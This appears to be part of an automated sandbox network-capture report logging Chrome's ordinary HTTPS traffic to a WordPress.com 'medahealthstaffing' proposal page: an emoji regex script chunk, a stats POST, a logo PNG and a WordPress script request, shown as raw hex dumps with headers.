                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75
                                                                                                                                                                                                                                                Data Ascii: \ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udfff\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udffb-\udffe]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\u
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66
                                                                                                                                                                                                                                                Data Ascii: fff]|\ud83d\udc69\ud83c\udffe\u200d\ud83e\udd1d\u200d\ud83d\udc69\ud83c[\udffb-\udffd\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\udffb-\udfff
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64
                                                                                                                                                                                                                                                Data Ascii: d83d\udc8b\u200d\ud83d[\udc68\udc69]|\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c[\udffc-\udfff]|\ud83e\udef1\ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\udfff]|\ud83e\ud
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 64 64 34 5c 75 64 64 64 36 2d 5c 75 64 64 64 64 5d 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 5b 5c 75 32 36 34 30 5c 75 32 36 34 32 5d 5c 75 66 65 30 66 7c 28 3f 3a 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64
                                                                                                                                                                                                                                                Data Ascii: dd4\uddd6-\udddd])(?:\ud83c[\udffb-\udfff])?\u200d[\u2640\u2642]\ufe0f|(?:\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc66\u200d\ud83d\udc66|\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc68\u200d\ud83d\udc69\u200d\ud
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 5c 75 64 38 33 64 5c 75 64 63 61 62 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 64 5c 75 64 63 30 38 5c 75 32 30 30 64 5c 75 32 62 31 62 7c 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 29 7c 5b 23 2a 30 2d
                                                                                                                                                                                                                                                Data Ascii: \ud83d\udcab|\ud83e\udd3c\u200d\u2640\ufe0f|\ud83e\udd3c\u200d\u2642\ufe0f|\ud83e\uddde\u200d\u2640\ufe0f|\ud83e\uddde\u200d\u2642\ufe0f|\ud83e\udddf\u200d\u2640\ufe0f|\ud83e\udddf\u200d\u2642\ufe0f|\ud83d\udc08\u200d\u2b1b|\ud83d\udc26\u200d\u2b1b)|[#*0-
                                                                                                                                                                                                                                                2024-12-20 15:45:40 UTC1369INData Raw: 30 33 64 5c 75 33 32 39 37 5c 75 33 32 39 39 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 63 62 5c 75 64 66 63 63 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 64 37 34 5c 75 64 64 37 35 5c 75 64 64 39 30 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 30 7c 5b 5c 75 32 36 31 64 5c 75 32 36 66 37 5c 75 32 36 66 39 5c 75 32 37 30 63 5c 75 32 37 30 64 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 38 35 5c 75 64 66 63 32 2d 5c 75 64 66 63 34 5c 75 64 66 63 37 5c 75 64 66 63 61 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 34 32 5c 75 64 63 34 33 5c 75 64 63 34 36 2d 5c 75 64 63 35 30 5c 75 64 63 36 36 2d 5c 75 64 63 36 39 5c 75 64 63 36 65
                                                                                                                                                                                                                                                Data Ascii: 03d\u3297\u3299])(?:\ufe0f|(?!\ufe0e))|(?:(?:\ud83c[\udfcb\udfcc]|\ud83d[\udd74\udd75\udd90]|\ud83e\udef0|[\u261d\u26f7\u26f9\u270c\u270d])(?:\ufe0f|(?!\ufe0e))|(?:\ud83c[\udf85\udfc2-\udfc4\udfc7\udfca]|\ud83d[\udc42\udc43\udc46-\udc50\udc66-\udc69\udc6e


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                38192.168.2.1149806192.0.78.134436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC833OUTPOST /wp-admin/admin-ajax.php HTTP/1.1
                                                                                                                                                                                                                                                Host: dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 44
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                                                                                X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                Cookie: tk_ai=PfqOZc4jPU0a%2FtwKEstg1J5h; tk_qs=
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC44OUTData Raw: 61 63 74 69 6f 6e 3d 61 63 74 69 6f 6e 62 61 72 5f 73 74 61 74 73 26 73 74 61 74 3d 63 6f 70 69 65 64 5f 73 68 6f 72 74 6c 69 6e 6b
                                                                                                                                                                                                                                                Data Ascii: action=actionbar_stats&stat=copied_shortlink
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC728INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:42 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                X-hacker: Want root? Visit join.a8c.com/hacker and mention this header.
                                                                                                                                                                                                                                                Host-Header: WordPress.com
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                X-Robots-Tag: noindex
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                X-ac: 1.jfk _dca BYPASS
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                39192.168.2.1149808192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC618OUTGET /i/logo/wpcom-gray-white.png HTTP/1.1
                                                                                                                                                                                                                                                Host: s2.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:42 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 8203
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 19 May 2023 01:47:48 GMT
                                                                                                                                                                                                                                                ETag: "6466d544-200b"
                                                                                                                                                                                                                                                Expires: Sun, 20 Apr 2025 09:12:25 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC901INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 03 00 00 00 fc 08 2f b8 00 00 00 72 50 4c 54 45 de de de dd dd dd dc dc dc df df df e1 e1 e1 e3 e3 e3 e7 e7 e7 e8 e8 e8 ea ea ea ee ee ee ef ef ef eb eb eb e4 e4 e4 e2 e2 e2 e6 e6 e6 f1 f1 f1 f4 f4 f4 f6 f6 f6 fa fa fa fb fb fb fd fd fd ff ff ff fe fe fe f7 f7 f7 f5 f5 f5 e0 e0 e0 ec ec ec f2 f2 f2 ed ed ed e9 e9 e9 f8 f8 f8 fc fc fc f9 f9 f9 f3 f3 f3 f0 f0 f0 e5 e5 e5 db db db da da da 72 1c ce 58 00 00 1f 54 49 44 41 54 78 da ec da d9 96 aa 48 10 05 d0 8c 20 11 29 44 64 88 04 65 54 ff ff 1f ef bd 56 f7 ea 55 dd 2d 24 8e 08 67 3f eb 83 eb 18 91 53 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR/rPLTErXTIDATxH )DdeTVU-$g?S(
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 14 fb ff e2 73 27 16 b2 d3 84 26 d2 88 75 d5 da 6d e3 91 fa 7f 11 59 9d cd db 4a 33 4d 6c 1b b2 4e c4 42 e4 a0 c5 ff 0b eb d8 2a f2 29 de 76 b0 b2 8a bd db a0 d8 7f e0 55 6a 1f f9 a7 c6 9e 05 a8 f5 7f 10 f9 32 28 f3 1d 56 93 c5 2a 48 65 50 89 16 ff 37 da 17 32 e8 a4 79 ea 37 89 16 4f c1 1d ee e7 be f1 26 b1 19 4a a0 4f 18 fa 90 21 99 87 d4 7f e3 da c8 80 6e c5 a4 3e 00 d9 bc 08 fb 78 6f 25 fa 92 01 ed 41 d1 9c 66 3f 76 4b 5f d8 c9 d9 c9 80 52 f3 67 3d 12 fa 46 fa 35 cb 5e d8 39 6c a4 5f f7 79 d3 27 1c 16 d2 2f 3d f3 92 2f 5e 53 e9 65 2a 45 9f b8 64 d5 43 bf ab e6 c5 66 ee 19 e9 15 bb fc a9 2f c4 a5 f4 3b d0 42 33 0f 06 2f b0 e8 83 ff d0 a9 f4 3a f1 12 63 1f da b6 c7 21 ab 8b 99 16 fb 51 d1 f2 32 8f 06 56 73 22 f5 d9 86 06 bf 8a a5 1d dd 48 ed e6 ff 22 c5
                                                                                                                                                                                                                                                Data Ascii: s'&umYJ3MlNB*)vUj2(V*HeP72y7O&JO!n>xo%Af?vK_Rg=F5^9l_y'/=/^Se*EdCf/;B3/:c!Q2Vs"H"
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: bf b5 71 d0 d1 d4 49 ff 7d 7d ec df 10 5b 47 af d5 44 4c 77 9b 72 cd 98 78 bc 26 8a d4 1a 15 32 7b a5 0c 3c e2 72 cb 6c eb 7a d5 5b 67 5b f7 70 e5 2a 2f 79 a5 1e c9 19 9e b2 6d 95 49 ad 71 ba 77 fd 75 cd e5 d3 87 43 fd 6a a7 d1 9b c2 ae 5a 22 e2 8a 85 ef f0 56 11 2f f8 27 f8 f8 65 b0 d1 ea 14 6d 57 4d e3 0d 26 6a 70 22 2f 24 7c 38 2f bd 91 b0 50 b5 52 96 f1 fd c1 c3 77 78 fd aa fe 9c 8f ef bb 6f 9c 4e cc 0c 62 1b a1 e9 79 ba cd a9 5d f9 ca 0f 0c cd 14 dc 8b 74 13 f0 de 53 0d c1 e7 c0 1f 48 50 b4 5b d4 c6 e3 bd 7c e5 f4 45 01 0f df 05 9d d6 18 7d ee a5 49 f0 12 0b 1c 4a e6 fa 82 cc b9 aa 5a dd aa a5 aa 74 60 5f c4 6a fe 2b 4f 25 33 df 8f 0c 7c 5f 59 61 bd d0 1c 37 7b 0f 2f d0 03 5b e3 ca cb 77 9c 99 f8 2e 68 5c 63 74 41 a9 ed bb 87 ce df e4 7f 22 ee fa 71
                                                                                                                                                                                                                                                Data Ascii: qI}}[GDLwrx&2{<rlz[g[p*/ymIqwuCjZ"V/'emWM&jp"/$|8/PRwxoNby]tSHP[|E}IJZt`_j+O%3|_Ya7{/[w.h\ctA"q
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: de b2 f1 9d 52 0d df 5d b3 a2 1e 58 64 f4 90 34 18 c7 cb 77 bf e2 e2 3b dd 8c 9a 6e e1 5b 64 f4 c4 28 27 8c 90 99 ef c8 b8 76 3d a2 48 83 ee 9a 46 bf 91 3d cd 52 13 34 a2 55 66 be 47 2c 55 fd e5 d2 72 fb 6c 71 b2 b5 c8 e8 3e f4 67 36 73 be 73 1c 6f 3e 7e a5 d1 2b 1f 3a c3 84 df e8 f4 30 33 3a 26 06 be 1b 7a 15 e6 9b 3a 69 18 5d 3b ab 2a 7b 6b 2a 2e d4 9a 86 8f 03 73 7d 35 61 e0 fb b2 d1 23 7a 36 21 32 da 63 f4 42 6a 7d 91 39 ff fe 50 3c 7c a7 93 19 45 50 5b 6d f4 5e ea c5 7a ac 7c a7 8b e2 e1 3b 45 b3 f1 a0 db 46 37 0f 9a 2e 5c e7 f3 e9 f3 dd b4 da 34 c1 7d a3 53 c4 c9 f7 77 ba f3 f0 9d d2 d9 33 82 1c 37 ba 79 2a f6 46 9b b5 01 30 f0 7d 21 f7 de 92 eb 46 37 0f 9a 32 6c 16 a6 f3 f0 1d d7 85 e6 38 f7 8d 1e 28 03 55 31 36 a2 3b 13 df 91 cd bf cc ee 1b 5d c8
                                                                                                                                                                                                                                                Data Ascii: R]Xd4w;n[d('v=HF=R4UfG,Urlq>g6sso>~+:03:&z:i];*{k*.s}5a#z6!2cBj}9P<|EP[m^z|;EF7.\4}Sw37y*F0}!F72l8(U16;]
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 00 a0 18 79 51 87 39 b4 3f 69 6a 88 76 df 18 68 8b 41 f9 ae ce 95 db 5c 6b b0 76 46 c8 d4 41 d2 c6 93 a6 4e 6f 93 e8 bc d0 80 8f 17 f9 33 03 0d b5 a5 40 c2 36 51 96 8e 8c 42 7e 7c da d6 88 ef 6f 6b f7 4c 40 55 70 7f a6 f2 2c c9 76 07 f9 70 84 6b d4 c9 b1 1b 9e 34 e5 ef 2f 1b 1b 03 1d 8a 29 df b5 f4 95 88 e7 11 8c 77 b0 5d 0c 7e 9a 27 69 ea f4 26 dd eb 85 80 aa a0 fa dd b6 00 0e 2f 82 00 ac 0e a3 87 9e 41 20 a4 8e f3 7d 38 dd 9f 36 1c a6 7e fd ae d2 b3 f0 59 0b 36 17 23 34 a4 60 7c e7 56 6c 3e 80 ee 43 6b d3 b4 46 7c 1f f0 df 29 02 1b 24 63 62 6c af 72 be a7 98 ef c3 e9 7e 0d dc a1 b8 1a 20 4e 29 dd f7 c0 90 9a 2c 54 52 df c8 5f bf d2 1a a0 7b 48 55 b1 d3 5b ea 3b 03 da 3d 42 2b 31 ea a6 2d 35 85 15 9b 03 ba 07 55 15 a9 bd 95 90 3c ec ed 74 06 54 bc 47 30
                                                                                                                                                                                                                                                Data Ascii: yQ9?ijvhA\kvFANo3@6QB~|okL@Up,vpk4/)w]~'i&/A }86~Y6#4`|Vl>CkF|)$cblr~ N),TR_{HU[;=B+1-5U<tTG0
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC1369INData Raw: 26 df 41 7d cc 9b 8d 58 bf 52 42 42 fa 6b b1 a1 86 b1 35 68 7a 3b e3 e8 9b 27 7b 0b 9f 34 01 29 04 54 05 79 00 b2 51 11 1f ee fc 95 f5 4c d4 d3 42 c1 ad d8 71 72 1e 7b 8e fc 00 4a aa ff 17 dc 39 1d 8b 0f 8d 92 34 f1 95 c4 af 2a d8 66 b8 9e 11 e0 1e 47 c1 7f df 45 92 26 7e 57 de 04 56 2c 2a 12 b3 f4 1b c0 7d ee 80 3f 51 7d c3 eb 57 38 dd c3 ab 8a 52 0c 24 97 39 b5 9d e0 78 a4 45 c1 45 04 ba 03 2b 16 d1 5d bb 33 98 13 d1 83 cf 94 cb ce c2 d6 af 80 d6 85 a3 ab 8a 7a 21 c0 c1 d9 7b ee fc a5 9d be 14 2e 69 a2 36 50 f8 b6 18 c3 4b 9f 75 ad c0 b7 32 9b 60 08 ab ae 0a 5c bf c2 37 26 f9 65 71 fc 01 94 d1 a5 2f 7e 70 57 eb 28 01 55 80 e9 ce ad 58 1a f5 55 c0 02 98 75 b6 e6 af 70 cc c6 4d 9a 32 0b e4 26 73 ba 93 23 9a c5 c7 9c c3 df 22 ec 60 40 0a 62 b8 72 5f 11 c6
                                                                                                                                                                                                                                                Data Ascii: &A}XRBBk5hz;'{4)TyQLBqr{J94*fGE&~WV,*}?Q}W8R$9xEE+]3z!{.i6PKu2`\7&eq/~pW(UXUupM2&s#"`@br_
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC457INData Raw: 66 52 51 5c 27 65 2f 4e 0a 6c d3 1e c5 ba ce c5 59 5e 5e c2 76 8a 2a f5 19 3e d1 6f a3 26 62 66 a5 bd d3 ae 4e ce 99 11 57 c5 01 f7 6f 4f 89 bd e9 e5 21 26 1f d2 4b 73 0c 76 be ef 69 ad e9 0b a5 75 e5 fb 71 b0 6f 92 b1 cb 3f 2f df 88 fc fb 71 55 e7 f2 0c c6 f4 79 9e 9d bf 18 f2 bc 37 46 3e 21 f2 77 29 f2 b7 21 f2 57 8d bd 1d e4 85 e5 35 1e a6 2d 80 d5 ee 2c 2f aa db e3 8e 7d 21 44 a7 a4 90 97 63 d2 98 10 f9 72 88 bd ba 93 97 92 85 11 9e 98 2f 8c 98 e2 4b 21 2f c2 a4 3b 85 c8 d7 5a ee a5 bc 80 21 8c 18 75 7d 35 4c d3 21 93 6f d5 27 31 16 f9 ca 88 75 9c 64 df 96 f8 18 54 48 fc db 72 cf 91 f8 16 73 3f 74 46 d6 93 25 bb 0a 17 f2 ef 46 4c fe 31 cd 65 05 fd b9 39 e1 3a fe 3a b9 57 f1 a1 2c 64 41 a6 bb 06 1e 21 f1 97 42 ac bc 5d 78 5e 24 f8 a2 bb b6 11 96 f8 eb
                                                                                                                                                                                                                                                Data Ascii: fRQ\'e/NlY^^v*>o&bfNWoO!&Ksviuqo?/qUy7F>!w)!W5-,/}!Dcr/K!/;Z!u}5L!o'1udTHrs?tF%FL1e9::W,dA!B]x^$


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                40192.168.2.1149809192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC388OUTGET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1
                                                                                                                                                                                                                                                Host: s0.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:42 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:42 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 8426
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/15307-1700657605732.8684
                                                                                                                                                                                                                                                Expires: Fri, 21 Nov 2025 17:30:39 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
